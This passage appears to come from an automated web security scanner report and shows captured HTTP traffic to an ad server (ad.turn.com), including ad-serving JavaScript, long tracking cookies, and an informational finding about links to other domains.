Xeddz_jO_ftWvK6YyvSIbYzcA4q2yx3BGIBe1qfIDTYPebZTLrDwtRWptERdq1_CwAIiDWPEKR1gXBTdH5jry0PtoQ1AeLHTgneiPs4w-PNB0rlR8LbQ13hqHz-NHOrXrabdjXmcRCHTQmWZ5Wp2jjyoTn-TRx9yZxewgOeaPJ0dTEeD2PttBPdeqoht9ByqjYbOh33ulo3YD0zbB9W6Jh-fPou70xdysS9NILgDVV-2RjchUloGmpS1vpTy7CEw_F27aSBKrxrCOwXSkhXOnAokDiKNJ7fwESJ4HNhmJtjvBex-YKAXUSxCCUQ26wFsXGXfUWiK7dQaUAsNKGmGOpY_21OII2rMkfzJCRjod-12LuM3yNFSsZtDmqT68cmfxNCdttVxemNa-3CGw7dg2Xbxl9yyjxUjUlBm2w0A6oYt2TFvb88wfqRHkdzRktg9x4ASm7mYj6Inq-va6FwQyLupvU3--XP7Da31DnYEVo5TPgRz20FKAxRbrlyXHThuNPN1jDRBvhv9srP-kTaIcRKtruz8xbA3_z4NlZPxFoPt3Uw_aRVt2Sjt4NAApGdsd_-0PEMXjE6yPZZhOyvYBhiy3zUpF9BpGxWFEALHWvTD43XAH-Iz5LxlHD6gT5P6VEiPCAVtVdA-aRZXmNDP7lSI2wQSG2w5BlZ4tc8pkIHd8H8L-xK4fm6FGNUPUMYboq088JyqQUmOopNBcLSjTKn79ZOQhTmVdbYP4bgaO9TMDasDdVqyYLZMG4wQKFopdYuz1yBk_WTcjbPN3mh6T8lt42bAGUQkq0n0yMG86X_ZGC4oqWkH26xISdXb2Czt_sqnDjr15CZdwH63dX586rlVt-rm7c-SIYtOVAAH4DJGVnLyE0x0v__lBaWO87e1AlQVl6_5QQ0XtSgyP9-pRtjKBA9Cwx-7jM7wzJ-e1KR4AWumyOFjw1q3jr96MmE73EdnErm3CsZj-9Y-IHVpkhS7eipeok16HzBI1TUzj1EOHWWsSpuj37arSozuBgqeZjp8etrKVvDX7YWXcSdD1aEDMLZlwoKqMVJJLJFDSB1wQojnNFJ5MjwaWpgyFsbfzsaKbPWXKX_vqyjA0DxMoo1UcyAMl-UwHwhiIhI6vYlDAmBKnXsfya2KjePXc1jDyJp7bZT6sDf_Pg2Vk_EWg-3dTD9pFbmyKQTjNFZ_HcWRayD9282nXEORSTSNHt8-t3oj2i7-l7s6FAXEc8n5El2XcbrTuegxVWD_jGGk22eMLPtB6OBV0D5pFleY0M_uVIjbBBIb8Yl1NWuJvdZemV_gRsyhYECTZa3gg4ITiJkOIERx75guRh2N-PAXP1mZ83CNFUeGL7kLoy5e_c7ykdku9uolxbJgtkwbjBAoWil1i7PXIGQdIp3I_PcAy51x0-dohwxyvdUa0NuxLM2XW_puxeWePm7nvKhzW7ExyTUJftqS9GRtIcJ13wOqVugrJJQWfPaDlancBmCiobpoVQZKqqN2LNQ1OWRy-25B5SDAG71c9XpuyLlqht-ajodMyqXVi1Cfn2R2Vau7X5-cMnEdJ6r2Z4lgdvHdm53MAZaS0O0Qlfxblav9J01d-B7FA05rcUpzgSpee0pzn-zH34TLYJh2OKjNQuLSL_AER0bCrOYMby51tKibbkc9lEQA79dAymt-_4bu8BZkNrY1dGDCWhKzPhCgeWsgGfMkFX4HzQVWQqFg2BaAuYOnsQlSn5t3zRbJC5ryxb-3bGj5a5KFuu60RriTW_fRiD-EyoZMz5Idfibr8WjiDSnM4ZZATJKUQIeAiWWBUQxuKfY0m-KUHuSwyrtLP__ldjsbRYS1T0uHXJk24PSL8z3mFkMRObsNqHzbQA0GI3YPOGb-lYcNs_O6CBvbTlsrpNMd1ulI4WK-iREZGyAk6GegiyaVz00abWV5MmZ-fZCX_Ri2brYMHscON3agSj1p78H4smnUeQN5ozThlR1suhxo400NYsRnWwGfeWiJ1TDAaZIcpAr39zh4K7iKNV7BI50YuOvYUPTO2bQN4fyQSnFcwPjfDwZbBSsvKlG8M9beE-KPzFPUMPqmUIGBYPhkAM0V8Ec3x06vwXnMZEghdsKPsk3t0o6iBE_G1l8aLmFzsHxBxhdbF6ZR4o1EH9wuuSktDFKkbQwDphyNR2A64wqbonkcOCznLneqtknJBUV5xPA0q_m72DPx4y9cGq2SxLktQ82RQAlXbMGX1RCwZTHTEb4Y-w8vIE7xMGl5n-x6_dNctsmg2y-J7Qf49je_uHiyZQMqn6iPpP_jgBwscC4H7EST9njSjKbo5GCexBy8zIAiUxdUWnERcbJbfXtPFDdQNIlc_NQAI5BaidAF8ZdcnhUhaQZx_gVZ5RM2RQt8-CrAvQ2xmPxHLQ9FNKGm_otEhAuKCCL1ldjwdZsnyHbRQCUGjlpWhpeC8HZ0E-3snipRTbrPuJEsdt04psQlUPIjPlqdKSfwBFwmJI4O6PX8YfhTcbG4AsUupIMCtW92pY93UYfQKoQ4mjJSw1EYK6cBGodjW6hazRpuuHlWJ1JvOW-l8P0HN513R9DWs1EAP8qWIguyoREoF2kJIwx2tEHiHWkjfeBxQ7gLqfeAit_JGi1bkNsJ8PFUesr06hk7Uyqkx_5wP0wx4PE6wwjYdfnQyS8aaFxnusjLISLN2TJ3jpAVRrxYR-1Hb-tqekUsOmdFYg80aMUHzn4CBhCqLcCLSjMLK4TU-9Z53UuLuuUkAzGne6G5uAuqICLaao59R2elM0Ab3c_RTt10nS35UI7kGK7NiRfcS1KCLA5KaP26BtwiskEIQOxRYF7q7Ym3aKJQG1_aVzcIVyN8_fQgL5rKKSkDVUjOglsJUKw15qNG24102XqLE0rwT-8-KwGUPdkCWjk0EEMZkr4oLeFnX1LM_f8dwx2VpKyOHrG4_glnfgAbC5ZN7Uea_4nQJkgxI_msSbb6i7wiZqum8QQelnAkUDZM4ksZGlqtmBTf9hFgjscnX-1tljCUwf0byIT-FIvcCkGvbirxHYPrnUSHgwvkcqY0-WtJOH8xOGRlmfYebfXIHxp-Vq7z; fc=8RONmHb1aTVU770ve6jBWNLDYjaEPwW9o1L3C0zzno_cpLRe4bq3ReqRkOtaoYvFyHAuaTl9mF7nALiSlM6KORW1jBMsMhZGMM020wYbRBOBkYH-sePWOj8HY_mY9pYLlj0OKyDUJ6zCGerhtciQWknN5JzhBQj-IKpWSX33b5kVxzGoC7kGLIbIhejl5eSL117dg5whaFGMwxNuo3bM3cdBF4hyWWGJ3xpNV_dvAQw_F9c8z5-xQ96PvJcb-tlK; pf=5StVuEq9Dzy8SHy5LvPaE-CZbhgJZ6rTXPj0mN3Grh8IHKIn0aMUCJnjty0nF6sdUM6FlmDOQFfAiBBttkwsDHdyfZoF-SypcgCdfA-fGunB8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 16:45:46 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:45:46 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=RNJ9hNp_Ytke4K3_MLDetaBZCzjPRhryFEOqult4msa76nVUEQrqCfHGx7lLD55exEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7YnPNAqpsobwskjQzsb37_Pf2EzZTks7MGb0-GsBSAyZLfwESJ4HNhmJtjvBex-YKB5MGYB2nENTxzt6uCLwC5ZNpEEy1Y6E_EHxRfmbLZ1cZAp6lfWXEyXpQ0UKYwGF6TGhPyeXqnVY7Z3281c6JDsemNa-3CGw7dg2Xbxl9yyj4GzMLLi_eaSDDqINHp02oDhNKKp2uy6Jf_izbJ4fT1Iu_2URTPQwp7prxJqmG7gw9SyCjmpX6JZPgLa8yTvHuZqGjdQJTtjVZ9bXK_YQ_BTqP4noXltQtlWO_ADLz9yaG1HPNJmxjyYHWoZ-RvqO1R0S-iv_7FnY0Y5Xeddz_jO_ftWvK6YyvSIbYzcA4q2yx3BGIBe1qfIDTYPebZTLrDwtRWptERdq1_CwAIiDWPEKR1gXBTdH5jry0PtoQ1AeLHTgneiPs4w-PNB0rlR8LbQ13hqHz-NHOrXrabdjXmcRCHTQmWZ5Wp2jjyoTn-TRx9yZxewgOeaPJ0dTEeD2PttBPdeqoht9ByqjYbOh33ulo3YD0zbB9W6Jh-fPou70xdysS9NILgDVV-2RjchUloGmpS1vpTy7CEw_F27aSBKrxrCOwXSkhXOnAokDiKNJ7fwESJ4HNhmJtjvBex-YKAXUSxCCUQ26wFsXGXfUWiK7dQaUAsNKGmGOpY_21OII2rMkfzJCRjod-12LuM3yNFSsZtDmqT68cmfxNCdttVxemNa-3CGw7dg2Xbxl9yyjxUjUlBm2w0A6oYt2TFvb88wfqRHkdzRktg9x4ASm7mYj6Inq-va6FwQyLupvU3--XP7Da31DnYEVo5TPgRz20HK8hNK5y4spsdBx22_Atqh4yf7gWdRyY4nO--zz6sln7A3_z4NlZPxFoPt3Uw_aRVSN0m2klEeTW1KA1di8OAYXXVxlTgh_voK6emDWdftgO-nut4CNoTli9hKdQgGGL_ArFbsMU7SM_RHjy_6zjGAVdA-aRZXmNDP7lSI2wQSG_ZkBdgJgIHJ_0GD9hEAnNu6lhUpb2IzujoXnFpxd00nfu4977TrZ8GHyhed93dEHYQYHOHaF4abG8I094dduCWyYLZMG4wQKFopdYuz1yBkrjocbhf_en5ky2Zgm3rpe_TLLYkm6ow_hSldLzYIRQzPkiGLTlQAB-AyRlZy8hNM5CZdwH63dX586rlVt-rm7T5lk3rNTcwPq3Nv0aBcfX_WCWnBzCQuIbOVa7F8E-DsQQ0XtSgyP9-pRtjKBA9Cw6KpKCQRV_nuo9XTdqfcEuFjw1q3jr96MmE73EdnErm3vwl2KfkvqpOe3sJLkGJnPxWaM37S_qVbKjiLc0d7HG2j37arSozuBgqeZjp8etrKP0MMPHRCJQircGmeFefpToKqMVJJLJFDSB1wQojnNFLZVi-KxNkQ_VJiUnD6sFTZsgkWZhbwRXzuNDStWlCtyOUwHwhiIhI6vYlDAmBKnXtBmdLEA3K48MCNCNawEQzJsDf_Pg2Vk_EWg-3dTD9pFR_es5qV3056KPq2rUT5zBRTUUfVyhkIRasPswtxI7iKl7s6FAXEc8n5El2XcbrTucHE0v-tlwP1vZz1VQYwdIxV0D5pFleY0M_uVIjbBBIbBawJhlLv8g8ldsI-35kGCJVwRl8sycZ0PAtWrVTViuFYrui1COy2KOTpvlid1x6YDCy0LXBHUGgi2TaPtaYUWrJgtkwbjBAoWil1i7PXIGSp-mVft7M-LblYrLgbicDRcQIWfivnSOLEVf1fvaJ0LD4GOmXn-MdBpj5v6mUeKpEu_qA1v2JfEexKn5Jue0cnG6zc79hiM8lP3DRxPQPRgI0_xuWp1g1tkjZsLrAdv1550JC_L7GVNyA8GmhInk0modn5i3E9PsY1OXjKV8iYCdqOsFLtLW59aQLrs4R_Sm6HRv-fT0qZpcVwrwAMPoWw2SuEzmZPy7Pr3B2CT3i7f8WgzvsrFMQFtFLJosfmmwkcBIXiYC5KD6oiDkyhrBnCDrTceeWmOo3AglxIXXfIZd248k5q7u-e5MH_3Xle2fFdIDPTok26GX0-9FGi9EqsKDQR55l7woSi_1v5QjXhRriTW_fRiD-EyoZMz5Idfibr8WjiDSnM4ZZATJKUQIeAiWWBUQxuKfY0m-KUHuSwyrtLP__ldjsbRYS1T0uHXJk24PSL8z3mFkMRObsNqHzbQA0GI3YPOGb-lYcNs_O6CBvbTlsrpNMd1ulI4WK-iRF7ehMgm_ROAJYmpIw1CyVHCx4Lh6UpiYYG1o8vcl5mQP9VGVJnredzylZiYSDC8VOJU0K6xTdplSIqaWyjrlo4KhxO6BPAp6mtQbed5gA0Cjgnp6Rw5lmAsU07N51K5j3PZSzxrE9kN_uZFovGfORhH6MoH1n1mLx2USSZv2x8_HGESPaIScxefiiPNK0OCUG5MdnRQlgwUbxU_0BtXy0yd8WW2V42t-IFhBe9yaSFw1_tpW4L2632z_PWw-s3g_lGgo6LZg0d3xlBa7ocQft3sG2mMmWuyyqIdPSqtxjRklIlnrGECTG2lMEZCOsAdkiEkwcNQoFjB6uEJlwUgsEKF4_WO7NWBkt0qQueOBvF3XTM0Qj0i6d6Ne-SMo9ZRW34nL2E8dfUI4qK_3hTt65_O1ilUO_qIHp6Muzc_la1U_2OjiAOU7PEbuWm84pe5TEp0-dwH4uGF_DEF6HvhgoubqHZESmqy0_uUoo7aAuONZ3XbPI2lPBO0ew9_baQ3iGFyTbNllGW2-6SPL-Yz_5v0XPkSOvI7kYSdc19CnoSeevm6OsBW-cQfSWP67IsCnN3J3RK7HJ47DOwUgikkAA72ly1dOLu1ZkDcoAF8YeGRX_lq7jZ32JrugGCjUIuqMkyLoTQYaIc9uW48ZcNu2ciILtP-yK1JywsvYFiqMlV9gHJ2EXSlkdHYPQHM9nqB2E7HqGtyuc3OfzTlki21Iked0l5Ymb2bmtH2iyNubJGsSKw_zqF-QjnG4_NexZYaYWdSdJxVooCOghLFZBKn_0EQO2vAre22F8lnSmyeDcza7YGogWldkaT1u5x3E36xXrNS7o-uQk9nl956dFM0clLfmZEZSVy6Y-xcSL0nyDvBegaxMxUkPFg2MrXe2Tu6RZYK_eJ83sbVbZgk4Mm2xjvgW7-OS05wcvyGHBsJw9q1CYZ-KKGVDzHPl9zlz7CulV5IVqtOgzxHZaVHOIdEQIOjCbv6Ls4W-7l6hZieh5H5pfJvz0_xp0u9Sr3Ow-0lehezJJr2l8tby08-BywuvZFxyM4somZiu5xkNZQ15_U6Rpo-UcV-kqgda3I_RK6XB_G-nPmaE7wHqMJQ3-EmxOFvfzd5YD06fPVNZ1LTBZN4ocL1Rk_SlsYqw7IlYjuWqlv4egixt5B17GL1Jx5afmr; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:45:46 GMT; Path=/
Set-Cookie: fc=S44WeTE_hcsignE6AFtjxTFBxEpH-UBt3Uc78oaz-ks4OhgZIpdKD2vECvnz_VEM2CjyBHHN4B50paqel1-StJLdzlSJYnWgjgpSWPKJZqanh77CDv_Cb5k2sLKUWKhY0sNf3mqCcrIxbMgK0qZIglL8KhgM5_wQzjFfm742WtkVxzGoC7kGLIbIhejl5eSL117dg5whaFGMwxNuo3bM3cdBF4hyWWGJ3xpNV_dvAQw_F9c8z5-xQ96PvJcb-tlK; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:45:46 GMT; Path=/
Set-Cookie: pf=OVNtw8MrDe4zOGxOM10kFNSBGpiIYdHiApwAatXKnmoIHKIn0aMUCJnjty0nF6sdUM6FlmDOQFfAiBBttkwsDAZKN4lnizaJNQxHiqflBAzB8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:45:46 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 16:45:46 GMT
Content-Length: 10114


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
</div>\n            \n                <img border="0" src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=tf&c=19&mc=imp&pli=2442545&PluID=0&ord=&ord=3820894264794307202&rtu=-1">\n                \n        \n    \n        \n    \n                    \n                    \n\n\n\n\n                        <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&mktid=1&mpid=104198
...[SNIP]...

23.40. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25622058&ahcid=787926&bimpd=lkIA6MZjgdWNLb-ezcBaeR_R3Ys3RWmwKz7fP1nwguKkWeHPXDae0aU5zRDsg2DaUngWeeLXhaTZYK2uLANKOa9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BAVsGcZaad0LohGRrY_PptpgOqkQGoDTJbJd7uwGGvhIlgHBzIj8H9loLjUdnhyPRbB5cdXFU4eUtt0Sd-buMq4iT9bDskPT3GYIORMjuNHSgU2xBm3QHaMdsIoCKhXuXzRgCD-gHnxGWovO3Pj6yB57QZSR55M9KtvER9_PB-eitC8cnfVoc-ffY0bjr9ypPula_qJLrXcrZr4baiYl_ymbdXBugl_YriUkFVc2JIJzcrbHBKfRsOA81Nd1u8is6AaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IMmAKf-fTCPDGWd8sW3YPeje31BMcyDn3elA9zU91mj8tpJsct7VH1G9-d_6KUMHbX91mNtx9s8FQapZIbkQ1tLXj2l4eq3bXsLRG2lgk3vGND4gyL4tJYU4x0ZDJlERs5RRYa-cfSyudFlPXwGJCEdWGFeOJW7Ysm02dNTuGUaDt_T370WDWWY1SqEwEJwbhx8Qd9AYEkrt9Ysl-GVyMgJyFabNKBnxQoIOFlgiYOrJA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRO2gAMv4cK7GMUxys8ZZyWt7UCxBiTiBOAew&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBND4Z2k60TYf_MpTGsQfl-Ky5DMCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtwcQdRw2WoZD8G7XUPGVbZ5GL2fdg%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680301&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662301770&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303662301772&frm=1&adk=2614322350&ga_vid=1987845434.1303662302&ga_sid=1303662302&ga_hid=1938999785&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=4069653789&eid=33895130&fu=4&ifi=1&dtd=4
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=7n0jLc6wfhYtN4UC_xZHjDE8GknzFh8Yypyq6cE5VZLAQoMWzzeIRUwqlX4XkpTlxEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7b0mfx30Z0m20DUYOHma1iMewwKNG6Vp-GxfVf_EykU6LfwESJ4HNhmJtjvBex-YKCc8G7vou24z--w_gke0ns7NpEEy1Y6E_EHxRfmbLZ1cWrMkfzJCRjod-12LuM3yNEMg6fMWn5Rve6KLxWq7P0IemNa-3CGw7dg2Xbxl9yyjzN5A4QuG2K_aAO-SHF7T3HhNKKp2uy6Jf_izbJ4fT1IrryLc_cS88mcNh9O05zZai8bW8edLI4EYiBeioa8Nn9qGjdQJTtjVZ9bXK_YQ_BT6XeCQtDvRN0cpJn9N6TdvW1HPNJmxjyYHWoZ-RvqO1TyAJqDG6mEyZwudlJBlLWH_ftWvK6YyvSIbYzcA4q2yx3BGIBe1qfIDTYPebZTLrCK9n04eTj2yLvG-HV9NqT6KR1gXBTdH5jry0PtoQ1AeAN4eSYVpeIfay296bMhgEJxTnotBPRoUrzcJvCV5S7_9t1sffihX5_BegTFe1GGIwYQ2KIH69otvVReKhLMDlxtBPdeqoht9ByqjYbOh33uTTXcCOkVaDDw03VkGm3uOHwv5ZQ5m2mTzLC0Rhxp-gsGmpS1vpTy7CEw_F27aSBKg9k5fXKFuqlzR-8AtKPkx7fwESJ4HNhmJtjvBex-YKDH_58BKZxUkzXkRdgeq0Ix7dQaUAsNKGmGOpY_21OII_mjcC29cWKAFZLsmzdyJY4hmtwtXYBDOzWNMpz25aDBemNa-3CGw7dg2Xbxl9yyjwlA4TuBUvX_Z-aUIXCkrqYwfqRHkdzRktg9x4ASm7mYu_2URTPQwp7prxJqmG7gw6ah56-HOIRgSSdEiojeZMNqGjdQJTtjVZ9bXK_YQ_BT4YvFPHKFvClTetIp5sFmR7qweRFW5C80-4q0k8PchIH--7-v9iqta9cngGoURkxMGcnA7v8jRH4b4sl7n9PZN5e7OhQFxHPJ-RJdl3G607nR8xTSPvK-p126IlPZnORzVdA-aRZXmNDP7lSI2wQSG55QP38_1fR9TckYAsb5pqNucRLlW4qnXZ7CXUVHWv4ip4RnopZye3I2VeDNhcjONP3-03B9JybbDQvPN0b-ukCyYLZMG4wQKFopdYuz1yBk6uornER4wRmSESJpiu82ECcJYAYD6EJQRZIEqwxwbz_lEmZ6JYNjKYtD6G2Zr0AzhTeXLgOjd5mCNMGZRMvzlPAi0-ygCjElB_D6jIRDFHIIScgwH8T5VpAgEj7tO6HQQQ0XtSgyP9-pRtjKBA9Cw7ifk0uxOjACIFVeNuv3Kptjw1q3jr96MmE73EdnErm3EO2R2jzxNQwIDSsUseWLhslLQZMoibX_53_H1iN9tYSj37arSozuBgqeZjp8etrKSH2BCJVCBKtPUgj7zhVaUIKqMVJJLJFDSB1wQojnNFKx04J3oj7OMPjzQdK5UfC2Jq2FR28g6N4ppYAe8Ruw3nqjVEnayD5Ik9CHgcwVvzn1LVARRZp3iAtwxIPfX4lcsDf_Pg2Vk_EWg-3dTD9pFenpFYpar7IAWiFrHeXfQIHuPt4ZMkfGTNUtC_PYTNHvl7s6FAXEc8n5El2XcbrTueV1rSiLZsaR5sVWtdVotFRV0D5pFleY0M_uVIjbBBIbVCiLiBpBUs_aknr5mSZhhuLQXpLB6S1HBINAWF7E-PF0vobXYP71SE5qK-q8G4NqDlZT0T_GBbo0bdYkYrIM6bJgtkwbjBAoWil1i7PXIGQAPq2-xg2GU0iNwzc4oGYf3U9yID4iMwKKBdWV0IWb4UHV201d3HZkauFg6OLUDww3Jco1_R6UO1xvstgmxd5oQQ0XtSgyP9-pRtjKBA9Cw-GbtMuSaHyCQtilVO0TY35jw1q3jr96MmE73EdnErm3sXSWj33G2Id3fM0m0Vv4l0jli_TYoFivdNz7W5XnWhDyphPg-RvEIoKBsFf6hjJvz2j2Qwj8cAVDSdBqW8BsrEqZy6Y983pwwSDKSbe2RC_kQoqJU_QjMpvwA6B8XQ75PSe6v1RpmK4AsjvGkw2msw7A-ILjAFqpx2M97C_Qtz6J-BEk0gCmyMGiyl2orSTXJgj3PYUSQksso83I27-VpIdXcEj3ATIHZ85bzjN59N1DesUH20WtmvEB85BGPQpVkX1adMEtSrGVs2U2coDfuajCpNlzAU3BFA2FUt1sY_z7JOCOD7od2p9Te_znzPLbFA49dyv4IOKemp9vkrTaHkid5u8voWars0ao_qpATqMTOTrNaZNANkBQjTexPCSafTSgpU4WHI3o7mz1yzeVtYE8N214FgBQDqQ4AvNfADBxNFi6SzWBu_A0Bbz1DMFVPSwfzkEF_z-gmdBqR5XUS_M3WvwMyoFdwzhFXPWWQAksB_srXEX4XpRKl9JBbxfxCG0ws7RKdslrrWG9FSHPfhOol8x7GcPW7kOnjSxzWjOywl4MuvfIipJ5uQ86jruUqv-BIgls5GMzhMPeQwyEEFAsLCSkxSCrw_Ka5doSqf2n0-lzpZDW3GxkM5Vc5hSjx5E4ajxLy24vZakjmlK7hBJK_lYL5YT6meUEDXaDLlth6GMsF-ZOXLRkCIiZdG4M_0HrCDKWrOFAi-3C0FAmBHnxfGYbg8COr02CVA34ezeHr4kD4IlHa-MMtxzuRfpv6ZVy5tUFP8vHhPZZkAmMM57eIbw_tY4C8HwmvvlhVGv8f4oOlu-Y0H6CqCbpQlF3v4slE2NCoocDEbMh7cDYOl_pU1S1DLzGiyxwGcuqgclX7IX5kFw94Ao9YPRny-RliH0i_LnkGLCdmk4MHDY7cSGOzokR-Oj8vP_2TSIYVN-8eQQ9O4KBYCVz0qItajtxmAshwxhbdMwe6MleT6PyVNqDXQwOLOIY2xu6P46AVksb7XdGynWyfHWytc_1lQPjrr750zRIZosJx9vG-GX2NHM7sKXJ37jo8-Jo4l8ddC